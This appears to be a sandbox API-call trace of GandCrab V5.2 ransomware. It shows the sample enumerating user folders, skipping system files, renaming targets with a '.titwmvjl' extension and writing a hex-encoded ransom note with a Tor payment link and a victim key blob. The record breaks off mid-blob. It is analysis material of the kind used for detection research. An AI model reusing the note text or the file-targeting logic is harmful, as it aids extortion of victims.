(lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\TITWMVJL-DECRYPT.txt") returned 97 [0069.775] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\NAHQNPMN\\TITWMVJL-DECRYPT.txt") returned 97 [0069.775] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0069.775] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0069.775] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0069.775] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0069.775] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0069.775] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0069.775] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0069.775] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0069.775] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.775] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 0 [0069.775] FindClose (in: hFindFile=0x5033f8 | out: hFindFile=0x5033f8) returned 1 [0069.775] CloseHandle (hObject=0x2cc) returned 1 [0069.775] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0069.775] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0069.775] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0069.775] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\TITWMVJL-DECRYPT.txt" [0069.775] lstrlenW (lpString=".titwmvjl") returned 9 [0069.775] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\TITWMVJL-DECRYPT.txt") returned 88 [0069.775] VirtualAlloc (lpAddress=0x0, dwSize=0xf0, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.776] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 97 [0069.776] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\TITWMVJL-DECRYPT.txt") returned 88 [0069.776] lstrlenW (lpString=".txt") returned 4 [0069.776] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.776] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0069.776] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0069.776] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.776] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\TITWMVJL-DECRYPT.txt") returned 88 [0069.776] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\AssetCache\\TITWMVJL-DECRYPT.txt") returned 88 [0069.776] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0069.776] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0069.776] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0069.776] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0069.776] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0069.776] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0069.776] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0069.776] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0069.776] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.776] FindNextFileW (in: hFindFile=0x5037b8, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 0 [0069.777] FindClose (in: hFindFile=0x5037b8 | out: hFindFile=0x5037b8) returned 1 [0069.777] CloseHandle (hObject=0x2c4) returned 1 [0069.778] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0069.778] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0069.778] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0069.778] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\d2ca4a09d2ca4deb61a.lock" [0069.778] lstrlenW (lpString=".titwmvjl") returned 9 [0069.778] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\d2ca4a09d2ca4deb61a.lock") returned 81 [0069.778] VirtualAlloc (lpAddress=0x0, dwSize=0xe2, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.778] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 90 [0069.778] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\d2ca4a09d2ca4deb61a.lock") returned 81 [0069.778] lstrlenW (lpString=".lock") returned 5 [0069.778] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0069.778] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0069.778] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.778] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.779] FindNextFileW (in: hFindFile=0x5033b8, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0069.779] lstrcmpW (lpString1="NativeCache", lpString2=".") returned 1 [0069.779] lstrcmpW (lpString1="NativeCache", lpString2="..") returned 1 [0069.779] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\", lpString2="NativeCache" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache" [0069.779] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\" [0069.779] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0069.779] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.779] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0069.779] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.779] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0069.779] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.780] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0069.780] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0069.780] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0069.780] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0069.780] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0069.780] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\\\TITWMVJL-DECRYPT.txt") returned 90 [0069.780] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Adobe\\Flash Player\\NativeCache\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\adobe\\flash player\\nativecache\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0069.781] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x